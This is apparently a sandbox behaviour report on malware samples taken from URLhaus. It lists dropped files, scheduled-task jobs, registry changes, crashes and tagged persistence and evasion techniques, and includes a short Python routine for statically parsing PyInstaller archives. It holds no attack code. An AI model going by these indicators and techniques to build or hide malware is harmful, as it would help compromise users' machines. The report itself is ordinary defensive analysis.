File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_th.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psuser.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bn.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_et.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_vi.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fil.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_it.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_es-419.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bg.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_te.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bn.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ml.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psuser_64.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en-GB.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ur.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine_64.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File opened for modification | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateOnDemand.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_it.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_tr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_zh-TW.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateBroker.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psuser.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_kn.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_id.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_lv.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psmachine_64.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_is.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_no.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ru.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_hu.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ms.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hi.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pl.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_mr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File opened for modification | C:\Program Files (x86)\Google\Temp\GUT656E.tmp | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateBroker.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_am.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_mr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ta.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_tr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pt-BR.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_uk.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_da.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_nl.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_sv.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_el.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_pt-PT.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdate.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bg.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
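The "Detects Pyinstaller" hit above carries no indicator, so here is how to confirm it statically rather than taking the tag on trust. The Python below is an added example written for this page, not tooling from the sandbox, from PyInstaller or from any of the samples: it locates the trailer ("cookie") that PyInstaller appends to a onefile archive by searching for its magic bytes and unpacks the fields (Python version, Python DLL name, table-of-contents position). The cookie layout `!8sIIii64s` is taken from my reading of PyInstaller's own archive reader and should be re-checked against the PyInstaller release you are dealing with; the binary the block parses is constructed inline, not the sample from this report.

```python
"""Locate and parse a PyInstaller onefile archive cookie. Added example for this page;
the cookie layout is an assumption from my reading of PyInstaller's CArchiveReader."""
import struct

# Magic at the start of the cookie that PyInstaller's bootloader looks for.
COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset, TOC length, Python version (major*100+minor),
# name of the Python DLL the bootloader will load. Network byte order.
COOKIE_FORMAT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)   # 88 bytes


def find_pyinstaller_cookie(data: bytes):
    """Return the parsed cookie of a PyInstaller archive embedded in `data`, or None.

    The archive is appended to the bootloader EXE and the cookie sits at the end of
    the archive, so the last occurrence of the magic is the one to parse. Bytes may
    follow the cookie (an Authenticode signature, for instance), which is why the
    search is not limited to the last 88 bytes of the file.
    """
    pos = data.rfind(COOKIE_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FORMAT, data[pos:pos + COOKIE_SIZE])
    return {
        "cookie_offset": pos,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": f"{pyvers // 100}.{pyvers % 100}",
        "pylib_name": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def build_sample(pyvers=311, pylib=b"python311.dll", trailing=b""):
    """Constructed stand-in for a onefile binary: a 256-byte stub that is not a real PE,
    a 128-byte fake archive body, the cookie, and optional bytes after the cookie."""
    stub = b"MZ" + b"\x90" * 254
    body = b"PYZ-00.pyz\x00" + b"\x00" * 117
    cookie = struct.pack(COOKIE_FORMAT, COOKIE_MAGIC, len(body) + COOKIE_SIZE,
                         len(body), 0, pyvers, pylib)
    return stub + body + cookie + trailing


if __name__ == "__main__":
    import sys
    # Pass a path to check a real file; with no argument the constructed sample is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample(trailing=b"\x00" * 64)
    info = find_pyinstaller_cookie(blob)
    print("no PyInstaller cookie found" if info is None else info)
```

On a real sample the interesting fields are `python_version` and `pylib_name`, which tell you which CPython runtime you need for decompiling the extracted .pyc files; `toc_offset` and `toc_length` are relative to the archive and are where a full extractor would continue.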

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\palladiums\translucently.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\key.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\http.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\msf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ping.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SysWOW64\ping.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772974190804545" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ = "IAppVersionWeb" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ = "IBrowserHttpRequest2" C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\INPROCSERVER32 C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
